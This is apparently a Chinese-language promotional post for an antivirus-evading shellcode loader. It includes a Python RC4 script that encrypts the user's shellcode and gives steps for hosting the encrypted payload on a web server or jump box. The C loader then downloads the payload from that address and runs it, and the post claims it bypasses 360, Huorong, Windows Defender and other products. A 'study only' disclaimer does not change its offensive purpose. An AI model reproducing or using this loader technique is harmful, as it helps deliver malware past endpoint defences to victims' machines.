项目介绍
此项目是一个简单的远程分离的加载器,免杀国内大部分杀软(360、火绒、Windows Defender、金山毒霸、电脑管家)
项目使用
Step 1:修改Encryption/payload_c_x64.py的24行,改为自己的shellcode
def rc4_encrypt(data, key):
S = list(range(256))
j = 0
# Key-scheduling algorithm (KSA)
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
# Pseudo-random generation algorithm (PRGA) & encryption
i = j = 0
result = bytearray()
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
k = S[(S[i] + S[j]) % 256]
result.append(byte ^ k)
return result
def main():
# 原始的payload(cale.exe)
payload = b"你的shellcode"
# 加密密钥
key = b"thisIsA16ByteKey" # 16字节密钥
# 使用RC4算法加密payload
encrypted_payload = rc4_encrypt(payload, key)
# 将加密的payload写入文件
with open("result.txt", "wb") as file:
file.write(encrypted_payload)
print("加密后的payload已写入result.txt")
if __name__ == "__main__":
main()
Step 2:运行python脚本(环境python3.6)
Step 3:将生成的result.txt上传到Web端(OSS、跳板等机器)
Step 3:copy自己的地址,例如:http://example.org,随后将http://example.org替换ShellCodeLoader/Source.c 的152行,生成64位发行版即可
查杀测试
360查杀:
window defender查杀:
金山火绒查杀:
免责声明
项目仅供进行学习研究,切勿用于任何非法未授权的活动,如个人使用违反安全相关法律,后果与本人无关。
下载地址
点击下方名片进入公众号
回复关键字【240620】获取下载链接